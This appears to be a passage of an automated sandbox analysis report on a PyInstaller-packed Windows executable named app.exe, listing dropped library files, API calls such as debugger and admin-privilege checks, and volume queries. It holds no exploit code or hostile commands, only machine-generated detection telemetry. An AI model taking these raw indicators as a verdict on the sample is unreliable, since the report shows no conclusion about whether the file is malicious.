    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\PublicKey\_ec_ws.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Util\_strxor.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\core\_multiarray_tests.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA256.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_sfc64.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_BLAKE2b.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\_elementtree.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\_ctypes.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_poly1305.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\_lzma.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_keccak.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-console-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\simplejson\_speedups.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_pcg64.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Util\_cpuid_c.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA224.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\pywintypes38.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\_win32sysloader.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-string-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\linalg\_umath_linalg.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_ARC4.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\win32wnet.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\psutil\_psutil_windows.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_aesni.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\PublicKey\_ed25519.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_ghash_clmul.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\bit_generator.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\_asyncio.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\_queue.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_Salsa20.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_MD2.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_cast.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\PublicKey\_ed448.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_chacha20.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\pyexpat.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\python3.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Protocol\_scrypt.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography\hazmat\bindings\_openssl.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\linalg\lapack_lite.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-file-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_MD4.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_mt19937.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\_ssl.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\fft\_pocketfft_internal.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\unicodedata.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ofb.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_aes.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_common.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ocb.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\zstandard\_cffi.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_arc2.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-file-l1-2-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\_socket.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\mtrand.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\_decimal.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\PublicKey\_x25519.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_BLAKE2s.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-16062
    Source: C:\Users\user\Desktop\app.exeAPI coverage: 0.8 %
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE96644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF7ACE96644
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE96644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF7ACE96644
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE87790 FindFirstFileExW,FindClose,0_2_00007FF7ACE87790
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACEA08E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7ACEA08E4
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE96644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,2_2_00007FF7ACE96644
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE96644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,2_2_00007FF7ACE96644
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE87790 FindFirstFileExW,FindClose,2_2_00007FF7ACE87790
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACEA08E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF7ACEA08E4
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80AA260 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,2_2_00007FF8A80AA260
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7EAB9D0 _Py_NoneStruct,_PyArg_ParseTuple_SizeT,GetSystemInfo,VirtualAlloc,_Py_Dealloc,PyExc_MemoryError,PyErr_SetString,_PyObject_GC_New,PyExc_NotImplementedError,PyErr_Format,Py_FatalError,PyObject_GC_Track,PyExc_SystemError,PyErr_SetString,_Py_Dealloc,_Py_Dealloc,2_2_00007FF8A7EAB9D0
    Source: app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2088340207.0000020832BEF000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2088649225.0000020832C36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT
    Source: cacert.pem.0.drBinary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE8B5DC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7ACE8B5DC
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACEA24D0 GetProcessHeap,0_2_00007FF7ACEA24D0
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE8B5DC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7ACE8B5DC
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE8B7C0 SetUnhandledExceptionFilter,0_2_00007FF7ACE8B7C0
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE8AFC4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7ACE8AFC4
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE99A14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7ACE99A14
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE8B5DC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7ACE8B5DC
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE8B7C0 SetUnhandledExceptionFilter,2_2_00007FF7ACE8B7C0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE8AFC4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF7ACE8AFC4
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE99A14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7ACE99A14
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7E71390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8A7E71390
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7E71960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8A7E71960
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7E81390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8A7E81390
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7E81960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8A7E81960
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7E91390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8A7E91390
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7E91960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8A7E91960
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7EBB748 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8A7EBB748
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7EBADE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8A7EBADE0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7EE3484 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8A7EE3484
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7EE366C SetUnhandledExceptionFilter,2_2_00007FF8A7EE366C
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7EE2A48 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8A7EE2A48
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7FF1AD8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8A7FF1AD8
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7FF1090 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8A7FF1090
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80F34B4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8A80F34B4
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81313D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8A81313D4
    Source: C:\Users\user\Desktop\app.exeProcess created: C:\Users\user\Desktop\app.exe "C:\Users\user\Desktop\app.exe"Jump to behavior
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACEA88E0 cpuid 0_2_00007FF7ACEA88E0
    Source: C:\Users\user\Desktop\app.exeCode function: ___lc_locale_name_func,GetLocaleInfoEx,2_2_00007FF8A80CF4F0
    Source: C:\Users\user\Desktop\app.exeCode function: GetLocaleInfoEx,FormatMessageA,2_2_00007FF8A80B285C
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\PublicKey VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\zstandard VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\altgraph-0.17.2.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\altgraph-0.17.2.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\altgraph-0.17.2.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\certifi VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cffi-1.15.1.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cffi-1.15.1.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cffi-1.15.1.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cffi-1.15.1.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cffi-1.15.1.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cffi-1.15.1.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography-36.0.2.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography-36.0.2.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\importlib_metadata-7.1.0.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\importlib_metadata-7.1.0.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\importlib_metadata-7.1.0.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\importlib_metadata-7.1.0.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\importlib_metadata-7.1.0.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\jsonschema-4.17.3.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\jsonschema-4.17.3.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\jsonschema-4.17.3.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\nbformat-5.8.0.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\nbformat-5.8.0.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\nbformat-5.8.0.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\nbformat-5.8.0.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\pyinstaller-5.3.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\pyinstaller-5.3.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\pyinstaller-5.3.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\setuptools-69.5.1.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\setuptools-69.5.1.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\setuptools-69.5.1.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\setuptools-69.5.1.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\setuptools-69.5.1.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\setuptools-69.5.1.dist-info VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\ucrtbase.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\base_library.zip VolumeInformationJump to behavior
